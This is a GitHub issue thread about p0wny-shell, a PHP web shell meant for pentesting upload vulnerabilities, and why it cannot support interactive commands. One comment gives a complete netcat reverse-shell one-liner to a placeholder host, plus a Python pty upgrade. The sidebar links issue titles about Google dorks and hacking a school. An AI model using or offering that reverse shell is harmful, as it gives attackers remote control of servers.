Comments (13)
flozz
commented on August 16, 2024
2
@cebe Your perfecly right, but I just wanted to keep things simple.
You can of course write a daemon using the php language, that will be interpreted by php-cli and daemonized using sysV init scripts, systemd, forever, pm2 or whatever daemon manager you want. But php website are not implemented this way, php websites run CGI-way using php-fpm or Apache mod-php.
p0wny-shell initial goal was to be used for pentesting php upload vulnerabilities (and then collecting information if the shell is successfully uploaded an can be executed), so it have to be a single-file php application that works CGI-way, like any other files of a classic php website.
p0wny-shell was not meant to replace an ssh access. If you need an interactive shell to administrate a server, there is already other projects that do this well, like shellinabox, (but that's more complicated to setup and you cannot install this on any web hosting).
I hope my explanations on the goals of p0wny-shell and why it will never support interactive shell are clear (if not ask me, as english is not my main language it can be difficult sometime to explain well)
:)
from p0wny-shell.
flozz
commented on August 16, 2024
1
@cebe I left it opened to remember me to add a FAQ with the information that this is not an interactive shell with a link to shellinabox :)
Also I wanted to add functionalities like file editing / downloading / uploading, but I have no time to do this now :(
from p0wny-shell.
sijanec
commented on August 16, 2024
1
Blocking interactive commands would be hard to implement. If you need
to restart apache to get p0wny working, you should consider setting a
timeout on both apache2 and php-fpm side to prevent resource hogging
and too many unneeded processes.
Regarding interactive commands: you will not be able to run vim, but
for some commands (su), you may try to create a fake tty with
environment variables set and then just read and write from the file
pipe directly. This is how I regained access to my server some time
ago when sshd stopped.
V V sre., 16. sep. 2020 ob 13:20 je oseba Fabien LOISON
<[email protected]> napisala:
…
I do not consider avoiding blocking interactive command to be run (it is not possible to list them all). Effectively it can blog a php worker, but php will timeout anyway so it should be ok at the end. :)
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or unsubscribe.
from p0wny-shell.
Kreijstal
commented on August 16, 2024
1
I just wanted to say there is https://github.com/tsl0922/ttyd for those that want such functionality
from p0wny-shell.
flozz
commented on August 16, 2024
Hello,
It is not possible to use interactive commands (vi, nano, htop,...). This is a PHP limitation as it works the CGI way (once the page is generated the program is stopped).
But an editor can be implemented on the p0wny-shell side (with some logic to download the file, and then re-upload it once edited).
from p0wny-shell.
oijkn
commented on August 16, 2024
Hi,
I come back to this question, how can I run a script and interact with it ? In PHP or Javascript ? Can you help me with that, please.
Thank you for your time and support.
BR.
from p0wny-shell.
flozz
commented on August 16, 2024
Hello,
This is not (and will never) be supported in p0wny-shell: it is just not possible with the project's stack (PHP+js).
The only way to have an interactive shell is to have a running daemon on the server (written in an other language than PHP (Python, Node, Ruby, or whatever)) that keep the processes open. With PHP, the program is always terminated once the response is sent (that the way PHP works).
from p0wny-shell.
cebe
commented on August 16, 2024
With PHP, the program is always terminated once the response is sent (that the way PHP works).
you can have a daemon written in PHP as well, the limitation is not by the language.
from p0wny-shell.
cebe
commented on August 16, 2024
I hope my explanations on the goals of p0wny-shell and why it will never support interactive shell are clear
I was assuming you considered adding this functionality as the issue was not closed :)
from p0wny-shell.
sijanec
commented on August 16, 2024
You can do:
mkfifo /tmp/fs1;cat /tmp/fs1|/bin/sh -i 2>&1|nc -q 5 HOSTADDRESS PORTNUMBER>/tmp/fs1
on remote machine and on your pc listen to incoming connecitons. You will get a shell on your local machine. Then enter
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py
to emulate a /bin/bash.
Keep in mind that this will need netcat and bash installed on the server and you will have to be able to make a tcp connection.
Not what you were looking for, but I hope this will help to someone else.
from p0wny-shell.
adrianbj
commented on August 16, 2024
@flozz - I completely understand why interactive commands don't work, but I wonder if you'd consider blocking them from being executed because I find that if you try one you end up needing to restart apache to get the site to work again. Do you also notice this problem?
from p0wny-shell.
flozz
commented on August 16, 2024
I do not consider avoiding blocking interactive command to be run (it is not possible to list them all). Effectively it can blog a php worker, but php will timeout anyway so it should be ok at the end. :)
from p0wny-shell.
flozz
commented on August 16, 2024
I close this issue as this feature will never be implemented in p0wny@shell, there is more advanced shells that handles this.
from p0wny-shell.
Related Issues (14)
- error json HOT 3
- Error while parsing response: SyntaxError: Unexpected end of JSON input HOT 1
- Dorks for Google HOT 2
- terminal window size HOT 2
- thanks i hacked my school with it xD HOT 4
- Error while parsing response: SyntaxError: JSON.parse: unexpected end of data at line 1 column 1 of the JSON data HOT 6
- Error while parsing response: SyntaxError: Unexpected end of JSON input HOT 7
- for remote server HOT 1
- Select a working execution function if disabled functions are present HOT 2
- Password protection HOT 1
- Add username@hostname HOT 6
- An error is thrown if a file contains non UTF-8 characters HOT 7
- Replace prompt "separator" on windows
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from p0wny-shell.